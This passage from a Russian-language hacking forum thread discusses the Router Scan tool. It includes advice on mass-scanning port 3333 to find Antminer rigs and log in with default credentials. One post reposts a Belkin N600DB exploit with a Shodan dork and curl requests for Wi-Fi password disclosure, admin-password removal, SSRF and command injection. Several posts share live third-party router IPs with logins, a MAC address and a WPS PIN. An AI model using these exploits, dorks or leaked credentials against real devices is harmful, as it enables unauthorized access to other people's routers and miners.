прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    не стоит заморачиваться. на этой ветке форума ранее уже обсуждался вопрос больших словарей по дефолту. пройдитесь по форуму. бесполезное занятие. таймаут не поможет. и в частности, большинство роутеров просто залочится (как одна из причин). для отсутствующих в списке паролей рекомендуется использовать функцию юс крединтиалс. хотя в принципе творческий подход к делу всегда заслуживает уважения...
     
    #5621 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
  2. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    здесь вам не ответят на этот вопрос. не потому, что не знают, а потому как :
    1. на этой ветке форума в основном собрались экспериментаторы, а не взломщики. взломами и мелкими пакостями с помощью роутерскана занимаются по большей части скрипткиди, которые "не забывают все галочки выставлять" в роутерскане :) большинство участников данной ветки такие вещи, как взломы и угоны не одобряют. достаточно просто прочитать посты старожилов, чтобы убедиться в этом.
    2.данная ветка форума, одна из самых обсуждаемых на форуме, т.к.роутерскан - один из самых топовых инструментов в нете. и в связи с этим привлекает к себе повышенное внимание не только любознательных участников, но и серьезных дядей в погонах. потому, это не та площадка для такого обсуждения. с такими вопросами вам действительно лучше в даркнете побродить. там обсуждаются взломы банкоматов, банковских серверов, угоны пайпала и майнеров.
    3.роутерскан в этом деле не помощник. тут требуются другие инструменты и другой подход. роутерскан - это мощный интеллигентный тестер, но с другими задачами. и никто его не будет подгонять под нужды каждого желающего что-либо взломать или угнать.

    теперь по теме.
    антминер работает через стандартный роутер. его подключают как клиента. потому его нужно искать ИМХО только через роутер.
    уверен, что вы в курсе этого, но на всякий случай
    https://mining-help.ru/articles/83-nastroika-antminer-s9-i-podklyuchenie.html

    попробуйте просканировать диапазон портов 3333. пройдитесь по диапазону, к примеру змапом, потом подключайте другие инструменты по найденным айпишникам.и в случае удачи - найдете.
    если определили - изучите конфиги. стандартный логин-пасс можно взять к примеру в том числе и отсюда
    https://github.com/bitmaintech/Antm...ghttpd-1.0/www/cgi-bin/minerConfiguration.cgi

    основной файл minerConfiguration.cgi (к слову по тому-же запросу можете поискать и на шодане).
    в том-же файле можно поискать и баги ( если дружите с кодингом). во всяком случае эксплойты тоже есть на антминер. наталкивался как-то несколько раз. лень искать. сами сможете найти. но в любом случае для роутерскана ( даже если бы и стоял так вопрос) они не пригодны. там нужно ручками ковырять.

    но в целом-полностью согласен с Ossen
    хотя в некотором смысле этот вопрос пересекается с роутерами. так-что это не совсем флуд. тем более, что изначально человеком ставился вопрос о включении антминера в роутерскан ;):)

    в соответствии с вашим предложением
    так и сделал. надеюсь, что мой ответ (в меру моих, наиболее чем скромных, познаний) вас удовлетворит.:)
     
    #5622 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
    Pebenok70, to.Index, Ossen and 3 others like this.
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    https://miloserdov.org/?p=712

    Новая статья про Router Scan v2.60 вышла, хорошо раскрывает потенциал новых фич, понравилась. :)
     
  4. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    тут та же статья
    только на русском. алексей дублирует свои статьи на английском для западных читателей. оно и правильно...:).нужно развиваться в ширь, не только в высоту :)
     
    #5624 sha9, 21 Jan 2018
    Last edited: 21 Jan 2018
    TEXAC, hunt.lsk, Triton_Mgn and 4 others like this.
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    На экспорт. :rolleyes:
     
    Triton_Mgn, Kakoluk and sha9 like this.
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    [​IMG]

    @sha9 aka Dik Lee зачем пользователей в заблуждение вводишь? o_O

    Сам то не разобрался... отправляйся читать документацию...

    (по посту - ответил на том форуме)
     
  7. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    шифу, документацию я читал. но в памяти живут ваши слова по поводу дополнительных модулей, высказанных вами на форуме ранее. к сожалению еще их не нашел. тогда стоял вопрос о добавлении эксплойтов в майадмин. и вы объяснили, что они (модули) есть, но не работают. может что не так понял. тогда извините... пост на том форуме удаляю, дабы не вводить в заблуждение
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Не нужно, пусть останется для истории (я своего не удалю).
     
  9. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    я и не настаивал :) это дело чисто субъективное, зависящее от многих факторов :)
    хотя, пусть с модулями я накосячил (что-то недопонял, а пост найти не могу,чтобы перечитать и понять где ошибся.видимо он ушел при глюке форума), а вот по поводу расширения словарей вы меня не поняли. я говорил о расширении словарей до размера радужных таблиц, а вы в том посте говорили о доработке под провайдера. это несколько разные вещи. :)
    п.с. я когда начал знакомиться с программой, тоже нарасширял так, что потом только с вашей помощью смог разобраться в чем проблема. так-что расширение проведено через личный опыт т.с. :)
     
    Ossen likes this.
  10. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    я уже сам запутался пример старые версии RS эти словари (что сам собирал) проходят. в новых что они есть что их нету нужная пара логин пароль присутствуют в словарях но увы
     
    #5630 Ossen, 22 Jan 2018
    Last edited: 23 Jan 2018
    sha9 likes this.
  11. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    568
    Likes Received:
    735
    Reputations:
    2
    эксплойт на Belkin N600DB Wireless Router. не знаю реализацию его в роутерскане. в списке поддерживаемых устройств есть, а в списке эксплойтов нет. но на всякий случай может кому будет интересно поиграться самому. не все же только на кнопочку старт тыкать :) эксплойт от 16/01/2018.

    # Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities # Date: 16/01/2018
    # Exploit Author: Wadeek # Hardware Version: F9K1102as v3 # Firmware Version: 3.04.11
    # Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as
    # Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin
    == Wireless Fingerprinting ==
    ESSID: "belkin.XXX" :Mode: Master
    Encryption key WPA2 Version 1 CCMP PSK: on
    Wireless Password/PIN: 8-alphanumeric
    DHCP: enable (192.168.2.1)
    MAC Address: 58:EF:68

    == Web Fingerprinting (With Locked Web Interface) ==

    dork: www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm"
    Device images:
    /images/troubleshooting/checkWires.png (600x270)
    /images/troubleshooting/startModem.png (600x270)
    /images/troubleshooting/stopModem.png (600x270)
    /images/troubleshooting/restartRouter.png (600x270)

    Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js

    == PoC ==

    Disclore wifi password:
    curl --silent "http://192.168.2.1/langchg.cgi"
    curl --silent "http://192.168.2.1/adv_wifidef.cgi"
    Closed "HTTPD server" port:
    curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
    Web Backdoor:
    http://192.168.2.1/dev.htm

    Server-Side Request Forgery (HTTP/FTP):
    {45.33.32.156 == scanme.nmap.org}
    curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
    curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/"

    Command Injection:
    curl --silent "http://IP/proxy.cgi?chk&url=--help"
    проверял этот запрос http://IP/langchg.cgi на получение вайфай. работает. при переходе на страницу запроса из браузера, нужно открывать иходный код страницы. там и ессид и пароль. если подключать запросы через бурп и etc, то этого не потребуется, дорк для шодана ""Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm" " вводить полностью (пояснения для тех, кто спрашивает как пользоваться чарльзом ;) ).
     
    #5631 sha9, 23 Jan 2018
    Last edited: 23 Jan 2018
    binarymaster likes this.
  12. kadet

    kadet Banned

    Joined:
    9 Mar 2011
    Messages:
    13
    Likes Received:
    8
    Reputations:
    0
    А что с IPv6. Будет когда нибудь поддержка данных диапазонов.???
     
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Как только случится генеральный рефакторинг (примерно) тысячи строк кода...
     
    Triton_Mgn, Payer, sha9 and 1 other person like this.
  14. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    В поддерживаемых есть Cisco Linksys WRT320N. А WRT300N не отпарсился у меня полностью. RS крайний.
     
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Скорее всего у них разная структура веб интерфейсов, поэтому так.
     
  16. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    Пока живой. Может посмотрите? 95.106.143.29:80 а:а
     
  17. inkugnito

    inkugnito Member

    Joined:
    10 Aug 2017
    Messages:
    22
    Likes Received:
    40
    Reputations:
    0
    Ничего сверхъестественного, просто айпи из списка пиров к популярной раздаче на одном из трекеров
    Снимок.JPG
     
  18. Pebenok70

    Pebenok70 Member

    Joined:
    5 Jul 2017
    Messages:
    105
    Likes Received:
    97
    Reputations:
    0
    binarymaster, ASUS DSL-N14U ADSL BC:EE:7B:60:BD:08 пока на 109.184.42.125 авторизация зациклилась, отпарсились мак и пин.
     
  19. ekaterina333

    ekaterina333 Banned

    Joined:
    11 Oct 2013
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    давно пользуюсь программой все отлично работает если руки с нужного места растут
     
    masilij and binarymaster like this.
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Который раз мне повторять, что в RS есть эксплойт, получающий только BSSID и ESSID? o_O